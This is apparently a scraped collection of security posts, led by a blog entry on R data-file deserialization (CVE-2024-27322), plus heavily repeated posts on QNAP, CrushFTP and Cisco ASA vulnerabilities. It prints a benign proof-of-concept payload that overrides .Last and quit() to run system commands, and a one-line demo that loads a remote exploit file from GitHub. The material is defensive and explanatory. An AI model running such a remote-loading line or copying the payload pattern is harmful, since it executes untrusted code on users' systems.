-----------------------------------------------Loading R data file in quarantined environment…-----------------------------------------------Loading objects:  .Last  quit-----------------------------------------Enumerating objects in loaded R data file-----------------------------------------.Last : function (...)   - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> quit : function (...)   - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> ------------------------------------Functions found: enumerating sources------------------------------------Checking `.Last`…!! `.Last` may execute arbitrary code on your system under certain conditions !!`.Last` source:{    cmd = if (.Platform$OS.type == "windows")         "calc.exe"    else if (grepl("^darwin", version$os))         "open -a Calculator.app"    else "echo pwned\\!"    system(cmd)}Checking `quit`…!! `quit` may execute arbitrary code on your system under certain conditions !!`quit` source:{    cmd = if (.Platform$OS.type == "windows")         "calc.exe"    else if (grepl("^darwin", version$os))         "open -a Calculator.app"    else "echo pwned\\!"    system(cmd)}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0/

The vulnerability, tagged CVE-2024-27322, can be exploited by tricking someone into loading a maliciously crafted RDS (R Data Serialization) file into an R-based project, or by fooling them into integrating a poisoned R package into a code base. https://www.theregister.com/2024/05/01/r_programming_language_ace_vuln/

JVNVU#96606632: Rプログラミング言語の実装において、安全でないデータのデシリアライゼーションが発生する問題（CVE-2024-27322） : 👀
---
https://jvn.jp/vu/JVNVU96606632/

A vulnerability (CVE-2024-27322) has been found in R versions 1.4.0 to 4.3.3. It's patched in 4.4.0 (24 April 2024), so you will be wanting to upgrade. #RStats
https://www.kb.cert.org/vuls/id/238194

@hrbrmstr @joranelias @Lluis_Revilla @brodriguesco @idavydov Right, it’s as much “expected behaviour” as in CVE-2024-27322, and as in other serialisation engines (e.g. Python pickle, .net BinaryFormatter, etc.). Which are all systems that are very hard to use correctly, and cause frequent direct vulnerabilities. Whether that makes the serialisation frameworks themselves a vulnerability… 🤷

(I did not register a CVE; for me this is an issue of awareness and documentation.)

@klmr @Lluis_Revilla I do agree that if you exploit a bug in the RDS parser and cause code execution this way, that's a terrible bug that must be fixed ASAP. But you can also, besides unserializing a promise, unserialize a lot of other well-formed things that would execute code upon being evaluated or printed, and that's R working by design. CVE-2024-27322 does not overflow stack or use-after-free in the parser, it just unserializes a promise. R's lazy evaluation relies on promises being serializable.

It would be great to have a safe (un-)serialization function, but the current system by itself doesn't deserve a CVE.

CVE-2024-27322, if you missed this:. #cybersecurity #infosec

Vulnerability in R Programming Language Enables Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ @SecurityWeek

The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. https://www.darkreading.com/application-security/r-programming-language-exposes-orgs-to-supply-chain-risk

🚨Looks like #RStats was not immune to deserialization bugs after all https://hiddenlayer.com/research/r-bitrary-code-execution/

Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!

CVE-2024-27322

I ended up having to burn time I honestly don't have this week to blog the stuff from the repo I made yesterday due to CERT and CISA making a big deal (https://www.cisa.gov/news-events/alerts/2024/05/01/certcc-reports-r-programming-language-vulnerability) out of expected behavior in #RStats due to a daft, hype-seeking vendor.

The profession that is cybersecurity is stupid broken.

I rly want (someone) to pwn an org with this CVE just to get it on KEV for sad posterity.

https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0/

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------Loading R data file in quarantined environment…-----------------------------------------------Loading objects:  .Last  quit-----------------------------------------Enumerating objects in loaded R data file-----------------------------------------.Last : function (...)   - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> quit : function (...)   - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> ------------------------------------Functions found: enumerating sources------------------------------------Checking `.Last`…!! `.Last` may execute arbitrary code on your system under certain conditions !!`.Last` source:{    cmd = if (.Platform$OS.type == "windows")         "calc.exe"    else if (grepl("^darwin", version$os))         "open -a Calculator.app"    else "echo pwned\\!"    system(cmd)}Checking `quit`…!! `quit` may execute arbitrary code on your system under certain conditions !!`quit` source:{    cmd = if (.Platform$OS.type == "windows")         "calc.exe"    else if (grepl("^darwin", version$os))         "open -a Calculator.app"    else "echo pwned\\!"    system(cmd)}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0/

As has been making the rounds, R version 4.4.0 patched a security issue:

https://hiddenlayer.com/research/r-bitrary-code-execution/
https://www.kb.cert.org/vuls/id/238194
https://nvd.nist.gov/vuln/detail/CVE-2024-27322

However, as noted on R-help, the issue runs much deeper:

https://stat.ethz.ch/pipermail/r-help/2024-May/479281.html

If I understand this correctly, avoiding external .rdata/.rds files from untrusted sources seems prudent.

#RStats

The vulnerability, tagged CVE-2024-27322, can be exploited by tricking someone into loading a maliciously crafted RDS (R Data Serialization) file into an R-based project, or by fooling them into integrating a poisoned R package into a code base. https://www.theregister.com/2024/05/01/r_programming_language_ace_vuln/

JVNVU#96606632: Rプログラミング言語の実装において、安全でないデータのデシリアライゼーションが発生する問題（CVE-2024-27322） : 👀
---
https://jvn.jp/vu/JVNVU96606632/

Update your Rs!

4.4.0 patched CVE-2024-27322, detailed below:

https://www.theregister.com/2024/05/01/r_programming_language_ace_vuln/

#R #DataScience #Statistics #Econometrics #MoarHashtag

A vulnerability (CVE-2024-27322) has been found in R versions 1.4.0 to 4.3.3. It's patched in 4.4.0 (24 April 2024), so you will be wanting to upgrade. #RStats
https://www.kb.cert.org/vuls/id/238194

@hrbrmstr @joranelias @Lluis_Revilla @brodriguesco @idavydov Right, it’s as much “expected behaviour” as in CVE-2024-27322, and as in other serialisation engines (e.g. Python pickle, .net BinaryFormatter, etc.). Which are all systems that are very hard to use correctly, and cause frequent direct vulnerabilities. Whether that makes the serialisation frameworks themselves a vulnerability… 🤷

(I did not register a CVE; for me this is an issue of awareness and documentation.)

CVE-2024-27322, if you missed this:. #cybersecurity #infosec

Vulnerability in R Programming Language Enables Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ @SecurityWeek

The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. https://www.darkreading.com/application-security/r-programming-language-exposes-orgs-to-supply-chain-risk

🚨Looks like #RStats was not immune to deserialization bugs after all https://hiddenlayer.com/research/r-bitrary-code-execution/

Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!

CVE-2024-27322

Hackers Exploit WP-Automatic Plugin Vulnerability, Threatening WordPress Site Security https://thecyberexpress.com/wp-automatic-plugin-vulnerability/ #WPAutomaticpluginvulnerabilities #WPAutomaticPluginVulnerability #criticalvulnerability #TheCyberExpressNews #WPAutomaticplugin #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202427956

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

• CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
• CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
• CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
• CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
• CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
• CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

• CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
• CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
• CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
• CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
• CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
• CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

• CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
• CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
• CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
• CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
• CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
• CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

• CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
• CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
• CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
• CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
• CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
• CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

• CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
• CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
• CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
• CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
• CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
• CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

• CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
• CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
• CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
• CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
• CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
• CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

CrushFTP VFS Sandbox Escape Vulnerability (CVE-2024-4040) https://fortiguard.fortinet.com/threat-signal-report/5431

Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis

While everyone's freaking out about Cisco, CISA added CrushFTP's actively exploited zero-day CVE-2024-4040 to the Known Exploited Vulnerabilities (KEV) Catalog: 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation #CISA #KnownExploitedVulnerabilitiesCatalog

@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb

• https://www.cve.org/CVERecord?id=CVE-2024-4040
• https://nvd.nist.gov/vuln/detail/CVE-2024-4040#VulnChangeHistorySection

Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.

https://www.cve.org/CVERecord?id=CVE-2024-4040

> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/

@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/

Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.

Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).

#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation

Exploit from airbus-cert is out for #crushFTP CVE-2024-4040

Expect more in the wild exploitation in the coming days.. https://infosec.exchange/@wvu/112320211100310152

h/t @JohnHammond https://github.com/airbus-cert/CVE-2024-4040

CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040) https://www.helpnetsecurity.com/2024/04/23/cve-2024-4040/ #CrowdStrike #enterprise #Don'tmiss #Hotstuff #CrushFTP #exploit #Censys #News #CVE #FTP

Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

https://github.com/directcyber/checkers/blob/main/nuclei-templates/CVE-2024-4040-crushftp-potentially-unpatched.yaml

#CVE20244040 #CVE_2024_4040

@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546

According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.

#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation

The CrushFTP zero-day is now CVE-2024-4040

https://nvd.nist.gov/vuln/detail/CVE-2024-4040

Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040

VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040

I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

https://www.cve.org/CVERecord?id=CVE-2024-4040

If anyone disagrees with our CVSS analysis, please let me know & bring proof

#CVE20244040 #CVE_2024_4040

Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis

@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb

• https://www.cve.org/CVERecord?id=CVE-2024-4040
• https://nvd.nist.gov/vuln/detail/CVE-2024-4040#VulnChangeHistorySection

Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.

https://www.cve.org/CVERecord?id=CVE-2024-4040

> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/

@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/

Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.

Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).

#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation

Exploit from airbus-cert is out for #crushFTP CVE-2024-4040

Expect more in the wild exploitation in the coming days.. https://infosec.exchange/@wvu/112320211100310152

h/t @JohnHammond https://github.com/airbus-cert/CVE-2024-4040

Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

https://github.com/directcyber/checkers/blob/main/nuclei-templates/CVE-2024-4040-crushftp-potentially-unpatched.yaml

#CVE20244040 #CVE_2024_4040

@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546

According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.

#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation

The CrushFTP zero-day is now CVE-2024-4040

https://nvd.nist.gov/vuln/detail/CVE-2024-4040

Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040

VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040

I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

https://www.cve.org/CVERecord?id=CVE-2024-4040

If anyone disagrees with our CVSS analysis, please let me know & bring proof

#CVE20244040 #CVE_2024_4040

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
3. Collect the outputs of the following commands:
   • show version
   • verify /SHA-512 system:memory/text
   • debug menu memory 8
4. Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

• Line Runner (PDF)
• Line Dancer (PDF)

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

